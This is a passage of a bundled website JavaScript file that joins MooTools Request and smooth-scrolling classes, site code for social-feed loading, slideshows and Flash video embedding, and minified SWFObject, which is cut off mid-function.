}this.running=false;this.status=0;$try(function(){this.status=this.xhr.status;}.bind(this));this.xhr.onreadystatechange=$empty;if(this.options.isSuccess.call(this,this.status)){this.response={text:this.xhr.responseText,xml:this.xhr.responseXML};
this.success(this.response.text,this.response.xml);}else{this.response={text:null,xml:null};this.failure();}},isSuccess:function(){return((this.status>=200)&&(this.status<300));
},processScripts:function(a){if(this.options.evalResponse||(/(ecma|java)script/).test(this.getHeader("Content-type"))){return $exec(a);}return a.stripScripts(this.options.evalScripts);
},success:function(b,a){this.onSuccess(this.processScripts(b),a);},onSuccess:function(){this.fireEvent("complete",arguments).fireEvent("success",arguments).callChain();
},failure:function(){this.onFailure();},onFailure:function(){this.fireEvent("complete").fireEvent("failure",this.xhr);},setHeader:function(a,b){this.headers.set(a,b);
return this;},getHeader:function(a){return $try(function(){return this.xhr.getResponseHeader(a);}.bind(this));},check:function(){if(!this.running){return true;
}switch(this.options.link){case"cancel":this.cancel();return true;case"chain":this.chain(this.caller.bind(this,arguments));return false;}return false;},send:function(k){if(!this.check(k)){return this;
}this.running=true;var i=$type(k);if(i=="string"||i=="element"){k={data:k};}var d=this.options;k=$extend({data:d.data,url:d.url,method:d.method},k);var g=k.data,b=k.url,a=k.method.toLowerCase();
switch($type(g)){case"element":g=document.id(g).toQueryString();break;case"object":case"hash":g=Hash.toQueryString(g);}if(this.options.format){var j="format="+this.options.format;
g=(g)?j+"&"+g:j;}if(this.options.emulation&&!["get","post"].contains(a)){var h="_method="+a;g=(g)?h+"&"+g:h;a="post";}if(this.options.urlEncoded&&a=="post"){var c=(this.options.encoding)?"; charset="+this.options.encoding:"";
this.headers.set("Content-type","application/x-www-form-urlencoded"+c);}if(this.options.noCache){var f="noCache="+new Date().getTime();g=(g)?f+"&"+g:f;
}var e=b.lastIndexOf("/");if(e>-1&&(e=b.indexOf("#"))>-1){b=b.substr(0,e);}if(g&&a=="get"){b=b+(b.contains("?")?"&":"?")+g;g=null;}this.xhr.open(a.toUpperCase(),b,this.options.async);
this.xhr.onreadystatechange=this.onStateChange.bind(this);this.headers.each(function(m,l){try{this.xhr.setRequestHeader(l,m);}catch(n){this.fireEvent("exception",[l,m]);
}},this);this.fireEvent("request");this.xhr.send(g);if(!this.options.async){this.onStateChange();}return this;},cancel:function(){if(!this.running){return this;
}this.running=false;this.xhr.abort();this.xhr.onreadystatechange=$empty;this.xhr=new Browser.Request();this.fireEvent("cancel");return this;}});(function(){var a={};
["get","post","put","delete","GET","POST","PUT","DELETE"].each(function(b){a[b]=function(){var c=Array.link(arguments,{url:String.type,data:$defined});
return this.send($extend(c,{method:b}));};});Request.implement(a);})();Element.Properties.send={set:function(a){var b=this.retrieve("send");if(b){b.cancel();
}return this.eliminate("send").store("send:options",$extend({data:this,link:"cancel",method:this.get("method")||"post",url:this.get("action")},a));},get:function(a){if(a||!this.retrieve("send")){if(a||!this.retrieve("send:options")){this.set("send",a);
}this.store("send",new Request(this.retrieve("send:options")));}return this.retrieve("send");}};Element.implement({send:function(a){var b=this.get("send");
b.send({data:this,url:a||b.options.url});return this;}});Request.HTML=new Class({Extends:Request,options:{update:false,append:false,evalScripts:true,filter:false},processHTML:function(c){var b=c.match(/<body[^>]*>([\s\S]*?)<\/body>/i);
c=(b)?b[1]:c;var a=new Element("div");return $try(function(){var d="<root>"+c+"</root>",g;if(Browser.Engine.trident){g=new ActiveXObject("Microsoft.XMLDOM");
g.async=false;g.loadXML(d);}else{g=new DOMParser().parseFromString(d,"text/xml");}d=g.getElementsByTagName("root")[0];if(!d){return null;}for(var f=0,e=d.childNodes.length;
f<e;f++){var h=Element.clone(d.childNodes[f],true,true);if(h){a.grab(h);}}return a;})||a.set("html",c);},success:function(d){var c=this.options,b=this.response;
b.html=d.stripScripts(function(e){b.javascript=e;});var a=this.processHTML(b.html);b.tree=a.childNodes;b.elements=a.getElements("*");if(c.filter){b.tree=b.elements.filter(c.filter);
}if(c.update){document.id(c.update).empty().set("html",b.html);}else{if(c.append){document.id(c.append).adopt(a.getChildren());}}if(c.evalScripts){$exec(b.javascript);
}this.onSuccess(b.tree,b.elements,b.html,b.javascript);}});Element.Properties.load={set:function(a){var b=this.retrieve("load");if(b){b.cancel();}return this.eliminate("load").store("load:options",$extend({data:this,link:"cancel",update:this,method:"get"},a));
},get:function(a){if(a||!this.retrieve("load")){if(a||!this.retrieve("load:options")){this.set("load",a);}this.store("load",new Request.HTML(this.retrieve("load:options")));
}return this.retrieve("load");}};Element.implement({load:function(){this.get("load").send(Array.link(arguments,{data:Object.type,url:String.type}));return this;
}});Request.JSON=new Class({Extends:Request,options:{secure:true},initialize:function(a){this.parent(a);this.headers.extend({Accept:"application/json","X-Request":"JSON"});
},success:function(a){this.response.json=JSON.decode(a,this.options.secure);this.onSuccess(this.response.json,a);}});

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>, MIT Style License.

MooTools.More = {
	'version': '1.2.3.1'
};

/*
Script: Fx.Scroll.js
	Effect to smoothly scroll any element, including the window.

	License:
		MIT-style license.

	Authors:
		Valerio Proietti
*/

Fx.Scroll = new Class({

	Extends: Fx,

	options: {
		offset: {x: 0, y: 0},
		wheelStops: true
	},

	initialize: function(element, options){
		this.element = this.subject = document.id(element);
		this.parent(options);
		var cancel = this.cancel.bind(this, false);

		if ($type(this.element) != 'element') this.element = document.id(this.element.getDocument().body);

		var stopper = this.element;

		if (this.options.wheelStops){
			this.addEvent('start', function(){
				stopper.addEvent('mousewheel', cancel);
			}, true);
			this.addEvent('complete', function(){
				stopper.removeEvent('mousewheel', cancel);
			}, true);
		}
	},

	set: function(){
		var now = Array.flatten(arguments);
		this.element.scrollTo(now[0], now[1]);
	},

	compute: function(from, to, delta){
		return [0, 1].map(function(i){
			return Fx.compute(from[i], to[i], delta);
		});
	},

	start: function(x, y){
		if (!this.check(x, y)) return this;
		var offsetSize = this.element.getSize(), scrollSize = this.element.getScrollSize();
		var scroll = this.element.getScroll(), values = {x: x, y: y};
		for (var z in values){
			var max = scrollSize[z] - offsetSize[z];
			if ($chk(values[z])) values[z] = ($type(values[z]) == 'number') ? values[z].limit(0, max) : max;
			else values[z] = scroll[z];
			values[z] += this.options.offset[z];
		}
		return this.parent([scroll.x, scroll.y], [values.x, values.y]);
	},

	toTop: function(){
		return this.start(false, 0);
	},

	toLeft: function(){
		return this.start(0, false);
	},

	toRight: function(){
		return this.start('right', false);
	},

	toBottom: function(){
		return this.start(false, 'bottom');
	},

	toElement: function(el){
		var position = document.id(el).getPosition(this.element);
		return this.start(position.x, position.y);
	},

	scrollIntoView: function(el, axes, offset){
		axes = axes ? $splat(axes) : ['x','y'];
		var to = {};
		el = document.id(el);
		var pos = el.getPosition(this.element);
		var size = el.getSize();
		var scroll = this.element.getScroll();
		var containerSize = this.element.getSize();
		var edge = {
			x: pos.x + size.x,
			y: pos.y + size.y
		};
		['x','y'].each(function(axis) {
			if (axes.contains(axis)) {
				if (edge[axis] > scroll[axis] + containerSize[axis]) to[axis] = edge[axis] - containerSize[axis];
				if (pos[axis] < scroll[axis]) to[axis] = pos[axis];
			}
			if (to[axis] == null) to[axis] = scroll[axis];
			if (offset && offset[axis]) to[axis] = to[axis] + offset[axis];
		}, this);
		if (to.x != scroll.x || to.y != scroll.y) this.start(to.x, to.y);
		return this;
	}

});


/*
Script: Fx.SmoothScroll.js
	Class for creating a smooth scrolling effect to all internal links on the page.

	License:
		MIT-style license.

	Authors:
		Valerio Proietti
*/

var SmoothScroll = Fx.SmoothScroll = new Class({

	Extends: Fx.Scroll,

	initialize: function(options, context){
		context = context || document;
		this.doc = context.getDocument();
		var win = context.getWindow();
		this.parent(this.doc, options);
		this.links = this.options.links ? $$(this.options.links) : $$(this.doc.links);
		var location = win.location.href.match(/^[^#]*/)[0] + '#';
		this.links.each(function(link){
			if (link.href.indexOf(location) != 0) {return;}
			var anchor = link.href.substr(location.length);
			if (anchor) this.useLink(link, anchor);
		}, this);
		if (!Browser.Engine.webkit419) {
			this.addEvent('complete', function(){
				win.location.hash = this.anchor;
			}, true);
		}
	},

	useLink: function(link, anchor){
		var el;
		link.addEvent('click', function(event){
			if (el !== false && !el) el = document.id(anchor) || this.doc.getElement('a[name=' + anchor + ']');
			if (el) {
				event.preventDefault();
				this.anchor = anchor;
				this.toElement(el);
				link.blur();
			}
		}.bind(this));
	}

});


if(navigator.userAgent.indexOf("MSIE 6") > -1 || navigator.userAgent.indexOf("MSIE 5") > -1) {
	document.write('<link href="/js/iepngfix.htc" rel="stylesheet" type="text/css" media="screen" />');
	document.write('<style type="text/css">');
		document.write('#footer_navigation_right span {background-image: url(/pics/icons/icon_switch.gif)}');
		document.write('#logo { behavior: url(/js/iepngfix.htc); width: 154px; height: 51px; }');
        document.write('#ytb_info { behavior: url(/js/iepngfix.htc); width: 300px; height: 225px; }');
        document.write('#fronius_logo { behavior: url(/js/iepngfix.htc); width: 150px; height: 41px; }');
        document.write('#slidehow_button_next, .jobmember, .sol_item, .contentserver, .artesia, .socialmedia, .textcontent img, .content_pagehead_icon, .formbutton, #f_submit, .slideshow_container_graphical, .but_status, .people_item_link_frame img, .joboffering { behavior: url(/js/iepngfix.htc); }');
        document.write('.follow_item { behavior: url(/js/iepngfix.htc); }');
        document.write('.top_pic, { behavior: url(/js/iepngfix.htc); width: 45px; height: 24px; }');
        document.write('.pngfix { behavior: url(/js/iepngfix.htc); width: 280px; height: 225px; }');
	document.write('<\/style>');
}
/* slider styles - implemented via js because of accessability without js */
document.write('<style type="text/css">');
	/* document.write('#textslider_container_1 { height: 293px; } #textslider_1 { position: absolute; }'); */
document.write('<\/style>');


/* ============================================================================= */
/*	Class: Feedloader, handels fetch and displaying of the social feed			 */
/* ============================================================================= */

	var feedLoader = new Class({
		initialize: function(type, target, more_button, feed_link){
            //this.feed_link = feed_link;
			this.type = type;
			this.targetelement = document.id(target);
			if(window.$('socialfeed_morelink')) {
                this.more_button = document.id(more_button);
                this.feed_link = document.id(feed_link);
            }else {
                this.feed_link = feed_link;
            };
			this.activeChunk = 1;
			this.updateFeed();
			this.isLoading = false;
		},
		updateFeed: function() {
			this.isLoading = true;
			this.chunkContainer = new Element('div', {id: 'chunkContainer_' + this.activeChunk, 'class': 'chunkcontainer'});
			this.toggleLinks();
			this.targetelement.grab(this.chunkContainer);
			this.displayLoader();
			this.adjustHeight(false);
			this.request = new Request.HTML({
                url:'/feed_ajax.php?hash='+this.feed_link, 
                onSuccess: this.writeFeedContent.bind(this),
                onFailure: function() {
                    this.isLoading = false;
                    this.toggleLinks();
                }
            }).get({'chunk': this.activeChunk, 'type': this.type});
		},
		writeFeedContent: function(responseTree, responseElements, responseHTML, responseJavaScript) {
			this.isLoading = false;
			this.chunkContainer.set('html', responseHTML);
			this.adjustHeight(true);
			this.toggleLinks();
			this.activeChunk++;
		},
		toggleLinks: function() {
             if(window.$('socialfeed_morelink')) {
                if (this.isLoading) {
    				this.more_button.setStyle('display', 'none');
    				this.feed_link.setStyle('display', 'none');
    			} else {
    				if (this.activeChunk == 1) {
    					this.more_button.addEvent('click', this.updateFeed.bind(this));
    					this.more_button.setStyle('display', 'block');
    					this.feed_link.setStyle('display', 'none');
    				} else {
    					this.more_button.setStyle('display', 'none');
    					this.feed_link.setStyle('display', 'block');
    				}
    			}
            } 
		},
		displayLoader: function(){
			this.chunkContainer.set('html', '<div style="padding: 10px 0 8px 0;"><table cellpadding="0" cellspacing="0"><tr><td style="height: 16px; padding-right: 5px"><img src="../pics/loader.gif" title="Loading ..." /></td><td>Loading ...</td></tr></table></div>');
		},
		adjustHeight: function(useEffect){
			// Get height of all chunk containers
			var height = 0;
			this.targetelement.getElements('div.chunkcontainer').each(function(el){
				height += el.getHeight();
			});
			
			if (useEffect) {
				var myFx = new Fx.Tween(this.targetelement, {transition: Fx.Transitions.Quint.easeOut, duration: 'long'});
				myFx.start('height', height);
			} else {
				this.targetelement.setStyle('height', height);
			}
		}
	});
	
	function initFlashPlayer(media, teaser, target_id, autoplay) {
		var flashvars = {};
			flashvars.file = media;
			flashvars.image = teaser;
			flashvars.author  = 'netmedianer GmbH';
			flashvars.controlbar = 'over';
			flashvars.bufferlength = 4;
			flashvars.autostart = autoplay;
			
			
		var params = {};
			params.menu = "false";
			params.allowFullScreen = "true";
			params.allowScriptAccess = "always"
			params.wmode ="transparent";
			params.salign = "B";
		
		swfobject.embedSWF("../media/player.swf", target_id, "300", "225", "9", "../media/expressinstall.swf", flashvars, params);
	}
	
	
/* ============================================================================= */
/*	Class: Manual slider, with prev/next buttons, as used on work page			 */
/* ============================================================================= */
	
	var manualSlider = new Class({
		initialize: function(targetId, sliderItems){
			this.targetId = targetId;
			this.sliderItems = sliderItems;
			this.sliderObject = null;
			if ($(this.targetId) && $(this.targetId + '_description_frame')) 
				this.initSlider();
		},
		initSlider: function() {
			var target_id = this.targetId;
			var slider = new noobSlide({
				box: $(target_id),
				items: this.sliderItems,
				size: 300,
				autoPlay: false,
				onWalk: function(currentItem, items){
					var current = Number(currentItem);
					var myChain = new Chain();
					
					// Hide visible descriptions
					$(target_id + '_description_frame').getChildren().each(function(el){
						if (!el.hasClass('hidden')) {
							myChain.chain(
								function(){ el.morph({opacity: 0}); },
								function(){ el.addClass('hidden'); }
							);
						}
					});
					
					// Show current descriptions
					var current_element = $(target_id + '_description_' + current);
					if (current_element) {						
						myChain.chain(
							function(){ current_element.setStyle('opacity', 0); },
							function(){ current_element.removeClass('hidden'); },
							function(){ current_element.morph({opacity: 1}); }
						);
					}
					
					for (var i=0; i<5; i++) {
						myChain.callChain();
					}
				}
			});
			this.sliderObject = slider;
			
			if ($(this.targetId + '_prev'))
				$(this.targetId + '_prev').addEvent('click', function(){slider.previous();});
                
				
			if ($(this.targetId + '_next'))
				$(this.targetId + '_next').addEvent('click', function(){slider.next();});			
		}
	});

/* ============================================================================= */
/*	Init: slider content large, slider screenshots							 	 */
/* ============================================================================= */
window.addEvent('domready', function(){ 	

	if ($('socialfeed_frame') && $('socialfeed_morelink') && $('socialfeed_feedlink')) {
		var socialfeed = new feedLoader('social', 'socialfeed_frame', 'socialfeed_morelink', 'socialfeed_feedlink');
	}
    
	if ($('blogfeed_frame') && $('blogfeed_morelink') && $('blogfeed_feedlink')) {
		var blogfeed = new feedLoader('blog', 'blogfeed_frame', 'blogfeed_morelink', 'blogfeed_feedlink');
	}
	
	if ($('eventfeed_frame') && $('eventfeed_morelink') && $('eventfeed_feedlink')) {
		var eventfeed = new feedLoader('event', 'eventfeed_frame', 'eventfeed_morelink', 'eventfeed_feedlink');
	}
    
    if ($('twitter_feed_1')) {
        var twitter_hash = $('twitter_feed_1').get('rel');
        var twitterfeed = new feedLoader('twitter_feed', 'twitter_feed_1', '', twitter_hash);
	}
    if ($('twitter_feed_2')) {
        var twitter_hash = $('twitter_feed_2').get('rel');
        var twitterfeed = new feedLoader('twitter_feed', 'twitter_feed_2', '', twitter_hash);
	}
    if ($('twitter_feed_3')) {
        var twitter_hash = $('twitter_feed_3').get('rel');
        var twitterfeed = new feedLoader('twitter_feed', 'twitter_feed_3', '', twitter_hash);
	}
   
	if ($('content_slideshow_container')) 
	{
	
		/* ===========================================
			slider: global variables	
		==============================================  */
	
		var itemsNS1 		= [0,1,2,3,4];
		var maxcount 		= (itemsNS1.length)-1;
		var firstItem		= 'but_status_0';
		var con_flash	    = '';
		/* ===========================================
			slider: init statusbar		
		==============================================  */
		   
		function initStatusBar() {
			var count 		= 0;
			var button 		= '';; 
			var buttonbar 	= '';
			
			// Generate buttons html
			itemsNS1.each(function (val) {
                var id_button = 'but_status_' + count;
				button = '<img id="' + id_button + '" class="but_status" src="../pics/icons/icon_point.png" alt="" title=""  />';
                
				if (count == 0) {
					button = '<img id="' + id_button + '" class="but_status" src="../pics/icons/icon_point_active.png" alt="" title=""  />';
				}
                if ($('slideshow_statusbar')) {
					buttonbar += button;
				}		
				count ++;
   			});
			$('slideshow_statusbar').set('html', buttonbar);

			// Set events
            count = 0;
            itemsNS1.each(function (val) {
                var id_button = 'but_status_' + count;
				var target_id = count;
                $(id_button).addEvent('click', function(event){
					nS1.walk(target_id);
                });
                count ++;
            });
        }


        
	
		/* ===========================================
			slider: large content			
		============================================== */
					
		var nS1 = new noobSlide({
			box: $('slideshow_1'),
			items: itemsNS1,
			//interval: 3000,
			size: 920,
			autoPlay: true,
			onWalk: function(currentItem, items){
				var current_element = (currentItem == null) ? $('slideshow_frame_1') : $('slideshow_frame_' + (currentItem+1));
			
				// Deactivate all flash videos
				$$('div[rel^=video]').each(function(el){
					if (el.getChildren().length > 0) {
						el.empty();
					}
				});
				
				/* On first page load: currentItem is null */
				if (currentItem == null) 
				{	
					initStatusBar();
				}
				/* On walk: currentItem is defined */
				else 
				{
					// Deactivate all buttons
					itemsNS1.each(function (val) {
						var button_id = 'but_status_' + val;
						$(button_id).src = '../pics/icons/icon_point.png';
					});
					currentButton = 'but_status_' + currentItem;
					$(currentButton).src = '../pics/icons/icon_point_active.png';					
				}
				
				// Activate flash video, if present
				if (current_element) {
					var video_element = current_element.getElement('div[rel^=video]');
					if (video_element) {
						var video_rel = video_element.get('rel');
						var a_video = video_rel.split('#');
						
						var video_container = new Element('div', {id: a_video[1]});
						video_element.grab(video_container);
						
						var previewPic = new Element('img', {src: a_video[3]});
						video_container.grab(previewPic);						
						video_container.addEvent('click', function() {initFlashPlayer(a_video[2], a_video[3], a_video[1], true)});
					}
				}
			},
			addButtons: {
				next: $('slidehow_button_next')
			}
		});
		
		//pausiere slideshow auf mouseover
		$('slideshow_1').addEvent('mouseover', function() {nS1.stop()});
		$('slideshow_1').addEvent('mouseleave', function() {nS1.play(5000,'next',true)});
        
		if ($('slide_social_media'))
			$('slide_social_media').addEvent('click', function() {nS1.walk(3)});

		if ($('slide_social_media1'))
			$('slide_social_media1').addEvent('click', function() {nS1.walk(1)});
		if ($('slide_social_media2'))
			$('slide_social_media2').addEvent('click', function() {nS1.walk(2)});
		if ($('slide_social_media3'))
			$('slide_social_media3').addEvent('click', function() {nS1.walk(3)});
        if ($('slide_social_media_contact1'))
			$('slide_social_media_contact1').addEvent('click', function() {nS1.walk(4)});     
        if ($('slide_social_media_contact2'))
            $('slide_social_media_contact2').addEvent('click', function() {nS1.walk(4)});
        if ($('slide_social_media_contact3'))
			$('slide_social_media_contact3').addEvent('click', function() {nS1.walk(4)});
		
		/* ===========================================
			slider: screenshot gallery			
		==============================================  */
		
		var itemsNS2 = [0,1,2]; //NBedit
		
		if ($('slideshow_2')) {
			var nS2 = new noobSlide({
				box: $('slideshow_2'),
				items: itemsNS2,
				size: 300,
				autoPlay: true
			});
		}
	}

	/* =====================================================
			slider: textchapter	anchor
	======================================================== */
	if ($('textslider_anchor'))
	{
		var mySmoothScroll = new Fx.SmoothScroll({
			wheelStops: false
		});	
	}
	
	/* =====================================================
			slider: textchapter	gallery slider
	======================================================== */
	if ($('slideshow_work_1'))
	{
		var itemsWorkNS1 = [0,1,2]; //NBedit
		if ($('slideshow_work_1')) {
			var workNS1 = new noobSlide({
				box: $('slideshow_work_1'),
				items: itemsWorkNS1,
				size: 300,
				autoPlay: true
			});
		}
	}
	
	if ($('slideshow_work_2'))
	{
		var itemsWorkNS2 = [0,1,2];
		var slideshow_work_manual = new manualSlider('slideshow_work_2', itemsWorkNS2);
	}
	if ($('slideshow_work_3'))
	{
		var itemsWorkNS3 = [0,1,2];
		var slideshow_work_manual = new manualSlider('slideshow_work_3', itemsWorkNS3);
	}
	
	
	/* =====================================================
			init flash videos
	======================================================== */
	$$('div[rel^=staticvideo]').each(function(el) {
		var a_video = el.get('rel').split('#');
		
		el.empty();
		
		var video_container = new Element('div', {id: a_video[1]});
		el.grab(video_container);
		
		initFlashPlayer(a_video[2], a_video[3], a_video[1], false);
	});
	
}); 




var noobSlide=new Class({initialize:function(a){this.items=a.items;this.mode=a.mode||'horizontal';this.modes={horizontal:['left','width'],vertical:['top','height']};this.size=a.size||240;this.box=a.box.setStyle(this.modes[this.mode][1],(this.size*this.items.length)+'px');this.button_event=a.button_event||'click';this.handle_event=a.handle_event||'click';this.onWalk=a.onWalk||null;this.currentIndex=null;this.previousIndex=null;this.nextIndex=null;this.interval=a.interval||5000;this.autoPlay=a.autoPlay||false;this._play=null;this.handles=a.handles||null;if(this.handles){this.addHandleButtons(this.handles)}this.buttons={previous:[],next:[],play:[],playback:[],stop:[]};if(a.addButtons){for(var b in a.addButtons){this.addActionButtons(b,$type(a.addButtons[b])=='array'?a.addButtons[b]:[a.addButtons[b]])}}this.fx=new Fx.Tween(this.box,$extend((a.fxOptions||{duration:500,wait:false}),{property:this.modes[this.mode][0]}));this.walk((a.startItem||0),true,true)},addHandleButtons:function(a){for(var i=0;i<a.length;i++){a[i].addEvent(this.handle_event,this.walk.bind(this,[i,true]))}},addActionButtons:function(a,b){for(var i=0;i<b.length;i++){switch(a){case'previous':b[i].addEvent(this.button_event,this.previous.bind(this,[true]));break;case'next':b[i].addEvent(this.button_event,this.next.bind(this,[true]));break;case'play':b[i].addEvent(this.button_event,this.play.bind(this,[this.interval,'next',false]));break;case'playback':b[i].addEvent(this.button_event,this.play.bind(this,[this.interval,'previous',false]));break;case'stop':b[i].addEvent(this.button_event,this.stop.bind(this));break}this.buttons[a].push(b[i])}},previous:function(a){this.walk((this.currentIndex>0?this.currentIndex-1:this.items.length-1),a)},next:function(a){this.walk((this.currentIndex<this.items.length-1?this.currentIndex+1:0),a)},play:function(a,b,c){this.stop();if(!c){this[b](false)}this._play=this[b].periodical(a,this,[false])},stop:function(){$clear(this._play)},walk:function(a,b,c){if(a!=this.currentIndex){this.currentIndex=a;this.previousIndex=this.currentIndex+(this.currentIndex>0?-1:this.items.length-1);this.nextIndex=this.currentIndex+(this.currentIndex<this.items.length-1?1:1-this.items.length);if(b){this.stop()}if(c){this.fx.cancel().set((this.size*-this.currentIndex)+'px')}else{this.fx.start(this.size*-this.currentIndex)}if(b&&this.autoPlay){this.play(this.interval,'next',true)}if(this.onWalk){this.onWalk((this.items[this.currentIndex]||null),(this.handles&&this.handles[this.currentIndex]?this.handles[this.currentIndex]:null))}}}});

/*	SWFObject v2.0 <http://code.google.com/p/swfobject/>
	Copyright (c) 2007 Geoff Stearns, Michael Williams, and Bobby van der Sluis
	This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var Z="undefined",P="object",B="Shockwave Flash",h="ShockwaveFlash.ShockwaveFlash",W="application/x-shockwave-flash",K="SWFObjectExprInst",G=window,g=document,N=navigator,f=[],H=[],Q=null,L=null,T=null,S=false,C=false;var a=function(){var l=typeof g.getElementById!=Z&&typeof g.getElementsByTagName!=Z&&typeof g.createElement!=Z&&typeof g.appendChild!=Z&&typeof g.replaceChild!=Z&&typeof g.removeChild!=Z&&typeof g.cloneNode!=Z,t=[0,0,0],n=null;if(typeof N.plugins!=Z&&typeof N.plugins[B]==P){n=N.plugins[B].description;if(n){n=n.replace(/^.*\s+(\S+\s+\S+$)/,"$1");t[0]=parseInt(n.replace(/^(.*)\..*$/,"$1"),10);t[1]=parseInt(n.replace(/^.*\.(.*)\s.*$/,"$1"),10);t[2]=/r/.test(n)?parseInt(n.replace(/^.*r(.*)$/,"$1"),10):0}}else{if(typeof G.ActiveXObject!=Z){var o=null,s=false;try{o=new ActiveXObject(h+".7")}catch(k){try{o=new ActiveXObject(h+".6");t=[6,0,21];o.AllowScriptAccess="always"}catch(k){if(t[0]==6){s=true}}if(!s){try{o=new ActiveXObject(h)}catch(k){}}}if(!s&&o){try{n=o.GetVariable("$version");if(n){n=n.split(" ")[1].split(",");t=[parseInt(n[0],10),parseInt(n[1],10),parseInt(n[2],10)]}}catch(k){}}}}var v=N.userAgent.toLowerCase(),j=N.platform.toLowerCase(),r=/webkit/.test(v)?parseFloat(v.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,i=false,q=j?/win/.test(j):/win/.test(v),m=j?/mac/.test(j):/mac/.test(v);/*@cc_on i=true;@if(@_win32)q=true;@elif(@_mac)m=true;@end@*/return{w3cdom:l,pv:t,webkit:r,ie:i,win:q,mac:m}}();var e=function(){if(!a.w3cdom){return }J(I);if(a.ie&&a.win){try{g.write("<script id=__ie_ondomload defer=true src=//:><\/script>");var i=c("__ie_ondomload");if(i){i.onreadystatechange=function(){if(this.readyState=="complete"){this.parentNode.removeChild(this);V()}}}}catch(j){}}if(a.webkit&&typeof g.readyState!=Z){Q=setInterval(function(){if(/loaded|complete/.test(g.readyState)){V()}},10)}if(typeof g.addEventListener!=Z){g.addEventListener("DOMContentLoaded",V,null)}M(V)}();function V(){if(S){return }if(a.ie&&a.win){var m=Y("span");try{var l=g.getElementsByTagName("body")[0].appendChild(m);l.parentNode.removeChild(l)}catch(n){return }}S=true;if(Q){clearInterval(Q);Q=null}var j=f.length;for(var k=0;k<j;k++){f[k]()}}function J(i){if(S){i()}else{f[f.length]=i}}function M(j){if(typeof G.addEventListener!=Z){G.addEventListener("load",j,false)}else{if(typeof g.addEventListener!=Z){g.addEventListener("load",j,false)}else{if(typeof G.attachEvent!=Z){G.attachEvent("onload",j)}else{if(typeof G.onload=="function"){var i=G.onload;G.onload=function(){i();j()}}else{G.onload=j}}}}}function I(){var l=H.length;for(var j=0;j<l;j++){var m=H[j].id;if(a.pv[0]>0){var k=c(m);if(k){H[j].width=k.getAttribute("width")?k.getAttribute("width"):"0";H[j].height=k.getAttribute("height")?k.getAttribute("height"):"0";if(O(H[j].swfVersion)){if(a.webkit&&a.webkit<312){U(k)}X(m,true)}else{if(H[j].expressInstall&&!C&&O("6.0.65")&&(a.win||a.mac)){D(H[j])}else{d(k)}}}}else{X(m,true)}}}function U(m){var k=m.getElementsByTagName(P)[0];if(k){var p=Y("embed"),r=k.attributes;if(r){var o=r.length;for(var n=0;n<o;n++){if(r[n].nodeName.toLowerCase()=="data"){p.setAttribute("src",r[n].nodeValue)}else{p.setAttribute(r[n].nodeName,r[n].nodeValue)}}}var q=k.childNodes;if(q){var s=q.length;for(var l=0;l<s;l++){if(q[l].nodeType==1&&q[l].nodeName.toLowerCase()=="param"){p.setAttribute(q[l].getAttribute("name"),q[l].getAttribute("value"))}}}m.parentNode.replaceChild(p,m)}}function F(i){if(a.ie&&a.win&&O("8.0.0")){G.attachEvent("onunload",function(){var k=c(i);if(k){for(var j in k){if(typeof k[j]=="function"){k[j]=function(){}}}k.parentNode.removeChild(k)}})}}function D(j){C=true;var o=c(j.id);if(o){if(j.altContentId){var l=c(j.altContentId);if(l){L=l;T=j.altContentId}}else{L=b(o)}if(!(/%$/.test(j.width))&&parseInt(j.width,10)<310){j.width="310"}if(!(/%$/.test(j.height))&&parseInt(j.height,10)<137){j.height="137"}g.title=g.title.slice(0,47)+" - Flash Player Installation";var n=a.ie&&a.win?"ActiveX":"PlugIn",k=g.title,m="MMredirectURL="+G.location+"&MMplayerType="+n+"&MMdoctitle="+k,p=j.id;if(a.ie&&a.win&&o.readyState!=4){var i=Y("div");p+="SWFObjectNew";i.setAttribute("id",p);o.parentNode.insertBefore(i,o);o.style.display="none";G.attachEvent("onload",function(){o.parentNode.removeChild(o)})}R({data:j.expressInstall,id:K,width:j.width,height:j.height},{flashvars:m},p)}}function d(j){if(a.ie&&a.win&&j.readyState!=4){var i=Y("div");j.parentNode.insertBefore(i,j);i.parentNode.replaceChild(b(j),i);j.style.display="none";G.attachEvent("onload",function(){j.parentNode.removeChild(j)})}else{j.parentNode.replaceChild(b(j),j)}}function b(n){var m=Y("div");if(a.win&&a.ie){m.innerHTML=n.innerHTML}else{var k=n.getElementsByTagName(P)[0];if(k){var o=k.childNodes;if(o){var j=o.length;for(var l=0;l<j;l++){if(!(o[l].nodeType==1&&o[l].nodeName.toLowerCase()=="param")&&!(o[l].nodeType==8)){m.appendChild(o[l].cloneNode(true))}}}}}return m}function R(AE,AC,q){var p,t=c(q);if(typeof AE.id==Z){AE.id=q}if(a.ie&&a.win){var AD="";for(var z in AE){if(AE[z]!=Object.prototype[z]){if(z=="data"){AC.movie=AE[z]}else{if(z.toLowerCase()=="styleclass"){AD+=' class="'+AE[z]+'"'}else{if(z!="classid"){AD+=" "+z+'="'+AE[z]+'"'}}}}}var AB="";for(var y in AC){if(AC[y]!=Object.prototype[y]){AB+='<param name="'+y+'" value="'+AC[y]+'" />'}}t.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+AD+">"+AB+"</object>";F(AE.id);p=c(AE.id)}else{if(a.webkit&&a.webkit<312){var AA=Y("embed");AA.setAttribute("type",W);for(var x in AE){if(AE[x]!=Object.prototype[x]){if(x=="data"){AA.setAttribute("src",AE[x])}else{if(x.toLowerCase()=="styleclass"){AA.setAttribute("class",AE[x])}else{if(x!="classid"){AA.setAttribute(x,AE[x])}}}}}for(var w in AC){if(AC[w]!=Object.prototype[w]){if(w!="movie"){AA.setAttribute(w,AC[w])}}}t.parentNode.replaceChild(AA,t);p=AA}else{var s=Y(P);s.setAttribute("type",W);for(var v in AE){if(AE[v]!=Object.prototype[v]){if(v.toLowerCase()=="styleclass"){s.setAttribute("class",AE[v])}else{if(v!="classid"){s.setAttribute(v,AE[v])}}}}for(var u in AC){if(AC[u]!=Object.prototype[u]&&u!="movie"){E(s,u,AC[u])}}t.parentNode.replaceChild(s,t);p=s}}return p}function E(k,i,j){var l=Y("param");l.setAttribute("name",i);l.setAttribute("value",j);k.appendChild(l)}function c(i){return g.getElementById(i)}function Y(i){return g.createElement(i)}function O(k){var 